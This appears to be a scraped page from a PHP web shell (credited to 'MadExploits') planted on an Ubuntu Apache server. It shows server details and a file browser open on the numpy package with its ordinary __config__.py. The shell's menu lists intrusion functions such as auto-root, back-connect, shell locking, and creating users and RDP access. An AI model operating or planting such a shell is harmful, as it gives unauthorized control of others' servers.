Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
numpy /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
compat
[ DIR ]
drwxr-xr-x
core
[ DIR ]
drwxr-xr-x
distutils
[ DIR ]
drwxr-xr-x
doc
[ DIR ]
drwxr-xr-x
f2py
[ DIR ]
drwxr-xr-x
fft
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
linalg
[ DIR ]
drwxr-xr-x
ma
[ DIR ]
drwxr-xr-x
matrixlib
[ DIR ]
drwxr-xr-x
polynomial
[ DIR ]
drwxr-xr-x
random
[ DIR ]
drwxr-xr-x
testing
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
typing
[ DIR ]
drwxr-xr-x
LICENSE.txt
1.51
KB
-rw-r--r--
__config__.py
3.99
KB
-rw-r--r--
__init__.cython-30.pxd
35.39
KB
-rw-r--r--
__init__.pxd
33.79
KB
-rw-r--r--
__init__.py
15.53
KB
-rw-r--r--
__init__.pyi
130.79
KB
-rw-r--r--
_distributor_init.py
331
B
-rw-r--r--
_globals.py
2.88
KB
-rw-r--r--
_pytesttester.py
6.15
KB
-rw-r--r--
_version.py
498
B
-rw-r--r--
char.pyi
1.67
KB
-rw-r--r--
conftest.py
3.94
KB
-rw-r--r--
ctypeslib.py
17.14
KB
-rw-r--r--
ctypeslib.pyi
451
B
-rw-r--r--
dual.py
2.16
KB
-rw-r--r--
matlib.py
10.12
KB
-rw-r--r--
py.typed
0
B
-rw-r--r--
rec.pyi
971
B
-rw-r--r--
setup.py
983
B
-rw-r--r--
version.py
371
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : __config__.py
# This file is generated by numpy's setup.py # It contains system_info results at the time of building this package. __all__ = ["get_info","show"] import os import sys extra_dll_dir = os.path.join(os.path.dirname(__file__), '.libs') if sys.platform == 'win32' and os.path.isdir(extra_dll_dir): if sys.version_info >= (3, 8): os.add_dll_directory(extra_dll_dir) else: os.environ.setdefault('PATH', '') os.environ['PATH'] += os.pathsep + extra_dll_dir blas_mkl_info={} blis_info={} openblas_info={} accelerate_info={} atlas_3_10_blas_threads_info={} atlas_3_10_blas_info={} atlas_blas_threads_info={} atlas_blas_info={} blas_info={'libraries': ['blas', 'blas'], 'library_dirs': ['/usr/lib/x86_64-linux-gnu'], 'include_dirs': ['/usr/local/include', '/usr/include'], 'language': 'c', 'define_macros': [('HAVE_CBLAS', None)]} blas_opt_info={'define_macros': [('NO_ATLAS_INFO', 1), ('HAVE_CBLAS', None)], 'libraries': ['blas', 'blas'], 'library_dirs': ['/usr/lib/x86_64-linux-gnu'], 'include_dirs': ['/usr/local/include', '/usr/include'], 'language': 'c'} lapack_mkl_info={} openblas_lapack_info={} openblas_clapack_info={} flame_info={} atlas_3_10_threads_info={} atlas_3_10_info={} atlas_threads_info={} atlas_info={} lapack_info={'libraries': ['lapack', 'lapack'], 'library_dirs': ['/usr/lib/x86_64-linux-gnu'], 'language': 'f77'} lapack_opt_info={'libraries': ['lapack', 'lapack', 'blas', 'blas'], 'library_dirs': ['/usr/lib/x86_64-linux-gnu'], 'language': 'c', 'define_macros': [('NO_ATLAS_INFO', 1), ('HAVE_CBLAS', None)], 'include_dirs': ['/usr/local/include', '/usr/include']} def get_info(name): g = globals() return g.get(name, g.get(name + "_info", {})) def show(): """ Show libraries in the system on which NumPy was built. Print information about various resources (libraries, library directories, include directories, etc.) in the system on which NumPy was built. See Also -------- get_include : Returns the directory containing NumPy C header files. Notes ----- Classes specifying the information to be printed are defined in the `numpy.distutils.system_info` module. Information may include: * ``language``: language used to write the libraries (mostly C or f77) * ``libraries``: names of libraries found in the system * ``library_dirs``: directories containing the libraries * ``include_dirs``: directories containing library header files * ``src_dirs``: directories containing library source files * ``define_macros``: preprocessor macros used by ``distutils.setup`` * ``baseline``: minimum CPU features required * ``found``: dispatched features supported in the system * ``not found``: dispatched features that are not supported in the system Examples -------- >>> import numpy as np >>> np.show_config() blas_opt_info: language = c define_macros = [('HAVE_CBLAS', None)] libraries = ['openblas', 'openblas'] library_dirs = ['/usr/local/lib'] """ from numpy.core._multiarray_umath import ( __cpu_features__, __cpu_baseline__, __cpu_dispatch__ ) for name,info_dict in globals().items(): if name[0] == "_" or type(info_dict) is not type({}): continue print(name + ":") if not info_dict: print(" NOT AVAILABLE") for k,v in info_dict.items(): v = str(v) if k == "sources" and len(v) > 200: v = v[:60] + " ...\n... " + v[-60:] print(" %s = %s" % (k,v)) features_found, features_not_found = [], [] for feature in __cpu_dispatch__: if __cpu_features__[feature]: features_found.append(feature) else: features_not_found.append(feature) print("Supported SIMD extensions in this NumPy install:") print(" baseline = %s" % (','.join(__cpu_baseline__))) print(" found = %s" % (','.join(features_found))) print(" not found = %s" % (','.join(features_not_found)))
Close